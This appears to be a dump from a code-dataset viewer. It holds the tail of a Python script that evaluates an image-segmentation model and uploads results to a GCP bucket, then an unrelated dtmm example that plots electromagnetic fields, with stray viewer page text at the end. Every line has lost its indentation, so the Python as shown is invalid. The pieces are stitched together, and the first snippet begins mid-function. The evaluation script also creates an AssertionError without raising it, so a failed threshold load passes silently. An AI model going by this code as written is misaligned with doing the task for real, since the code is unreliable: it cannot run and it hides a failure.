dataset_config = yaml.safe_load(f)['dataset_config']
with Path(local_model_dir, model_id, 'config.yaml').open('r') as f:
train_config = yaml.safe_load(f)['train_config']
if trained_thresholds_id is not None:
with Path(local_model_dir, model_id, trained_thresholds_id).open('r') as f:
threshold_output_data = yaml.safe_load(f)
target_size = dataset_config['target_size']
test_generator = ImagesAndMasksGenerator(
Path(local_dataset_dir, dataset_id, 'test').as_posix(),
rescale=1. / 255,
target_size=target_size,
batch_size=batch_size,
seed=None if 'test_data_shuffle_seed' not in train_config else train_config['test_data_shuffle_seed'])
optimized_class_thresholds = {}
if trained_thresholds_id is not None and 'thresholds_training_output' in threshold_output_data['metadata']:
for i in range(len(test_generator.mask_filenames)):
if ('x' in threshold_output_data['metadata']['thresholds_training_output'][str('class' + str(i))] and
threshold_output_data['metadata']['thresholds_training_output'][str('class' + str(i))]['success']):
optimized_class_thresholds.update(
{str('class' + str(i)): threshold_output_data['metadata']['thresholds_training_output'][str('class' + str(i))]['x']}
)
else:
AssertionError('Unsuccessfully trained threshold attempted to be loaded.')
else:
optimized_class_thresholds = None
compiled_model = generate_compiled_segmentation_model(
train_config['segmentation_model']['model_name'],
train_config['segmentation_model']['model_parameters'],
len(test_generator.mask_filenames),
train_config['loss'],
train_config['optimizer'],
Path(local_model_dir, model_id, "model.hdf5").as_posix(),
optimized_class_thresholds=optimized_class_thresholds)
results = compiled_model.evaluate(test_generator)
metric_names = [m.name for m in compiled_model.metrics]
with Path(test_dir, str('metrics_' + test_datetime + '.csv')).open('w') as f:
f.write(','.join(metric_names) + '\n')
f.write(','.join(map(str, results)))
metadata_sys = {
'System_info': getSystemInfo(),
'Lib_versions_info': getLibVersions()
}
metadata = {
'message': message,
'gcp_bucket': gcp_bucket,
'dataset_id': dataset_id,
'model_id': model_id,
'trained_thresholds_id': trained_thresholds_id,
'trained_class_thresholds_loaded': optimized_class_thresholds, # global thresh used if None
'default_global_threshold_for_reference': global_threshold,
'batch_size': batch_size,
'created_datetime': datetime.now(pytz.UTC).strftime('%Y%m%dT%H%M%SZ'),
'git_hash': git.Repo(search_parent_directories=True).head.object.hexsha,
'elapsed_minutes': round((datetime.now() - start_dt).total_seconds() / 60, 1),
'dataset_config': dataset_config,
'train_config': train_config,
'random-module-global-seed': random_module_global_seed,
'numpy_random_global_seed': numpy_random_global_seed,
'tf_random_global_seed': tf_random_global_seed,
'metadata_system': metadata_sys
}
with Path(test_dir, metadata_file_name).open('w') as f:
yaml.safe_dump(metadata, f)
os.system("gsutil -m cp -n -r '{}' '{}'".format(Path(tmp_directory, 'tests').as_posix(), gcp_bucket))
print('\n Test Metadata:')
print(metadata)
print('\n')
shutil.rmtree(tmp_directory.as_posix())
if __name__ == "__main__":
import argparse
import sys
argparser = argparse.ArgumentParser(sys.argv[0])
argparser.add_argument(
'--gcp-bucket',
type=str,
help='The GCP bucket where the raw data is located and to use to store the processed stacks.')
argparser.add_argument(
'--dataset-id',
type=str,
help='The dataset ID.')
argparser.add_argument(
'--model-id',
type=str,
help='The model ID.')
argparser.add_argument(
'--batch-size',
type=int,
default=16,
help='The batch size to use during inference.')
argparser.add_argument(
'--trained-thresholds-id',
type=str,
default=None,
help='The specified trained thresholds file id.')
argparser.add_argument(
'--random-module-global-seed',
type=int,
default=None,
help='The setting of random.seed(global seed), where global seed is int or default None (no seed given).')
argparser.add_argument(
'--numpy-random-global-seed',
type=int,
default=None,
help='The setting of np.random.seed(global seed), where global seed is int or default None (no seed given).')
argparser.add_argument(
'--tf-random-global-seed',
type=int,
default=None,
help='The setting of tf.random.set_seed(global seed), where global seed is int or default None (no seed given).')
argparser.add_argument(
'--message',
type=str,
default=None,
help='A str message the used wants to leave, the default is None.')
test(**argparser.parse_args().__dict__)
|
"""EM field example"""
import dtmm
import numpy as np
import matplotlib.pyplot as plt
WAVELENGTHS = [500,600]
SIZE = (128,128)
window = dtmm.aperture((128,128))
field_data = dtmm.illumination_data(SIZE, WAVELENGTHS,window = window,jones = (1,0),
pixelsize = 200, beta = (0,0.1,0.2), phi = (0.,0.,np.pi/6))
field = field_data[0]
#500nm
Ex = field[:,0,0] #Ex of the x-polarized light
subplots1 = [plt.subplot(i) for i in (231,232,233)]
subplots2 = [plt.subplot(i) for i in (234,235,236)]
for i,ax in enumerate(subplots1):
ax.imshow(Ex[i].real, origin = "lower")
#600nm
Ex = field[:,1,0]
for i,ax in enumerate(subplots2):
ax.imshow(Ex[i].real, origin = "lower")
plt.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.